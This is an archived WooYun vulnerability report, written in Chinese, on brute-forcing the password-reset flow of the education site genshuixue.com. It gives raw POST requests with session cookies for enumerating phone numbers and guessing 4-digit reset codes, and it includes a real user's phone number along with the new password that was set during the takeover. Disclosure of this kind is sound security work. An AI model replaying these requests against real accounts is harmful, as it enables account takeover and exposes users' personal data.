乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-28: 细节已通知厂商并且等待厂商处理中 2015-08-29: 厂商已经确认,细节仅向厂商公开 2015-09-08: 细节向核心白帽子及相关领域专家公开 2015-09-18: 细节向普通白帽子公开 2015-09-28: 细节向实习白帽子公开 2015-10-13: 细节向公众公开
RT
url:https://i.genshuixue.com/forget先爆手机号
POST https://i.genshuixue.com/forgotpwd/code.do HTTP/1.1Host: i.genshuixue.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/json; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: https://i.genshuixue.com/forgetContent-Length: 66Cookie: PHPSESSID=p3bg6jl0hc0kr7mqj0el808vb1; __guid__=decda22c-0bfe-659a-7b95-c9c8dc9d11a4; BAIJIA_YUNYING_ID=5b87c397784f4882ae8bd88056ad2293; iroute=f2ac93178ba33a8cdb4a55209c5d09daConnection: keep-alivePragma: no-cacheCache-Control: no-cache{"mobile":"15208189281","type":1,"countryCode":"86","symbol":"CN"}
得到一个手机号15208189768接着报验证码(验证码4位字符)
POST https://i.genshuixue.com/forgotpwd/modify.do HTTP/1.1Host: i.genshuixue.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/json; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: https://i.genshuixue.com/forgetContent-Length: 122Cookie: PHPSESSID=p3bg6jl0hc0kr7mqj0el808vb1; __guid__=decda22c-0bfe-659a-7b95-c9c8dc9d11a4; BAIJIA_YUNYING_ID=5b87c397784f4882ae8bd88056ad2293; iroute=f2ac93178ba33a8cdb4a55209c5d09daConnection: keep-alivePragma: no-cacheCache-Control: no-cache{"mobile":"15208189768","symbol":"CN","countryCode":"86","code":"1234","password":"123456qq","passwordConfirm":"123456qq"}
爆破成功
登录验证15208189768 123456qq
如上
验证码加长,现在尝试次数
危害等级:高
漏洞Rank:12
确认时间:2015-08-29 18:30
感谢白帽子,加急处理中..
暂无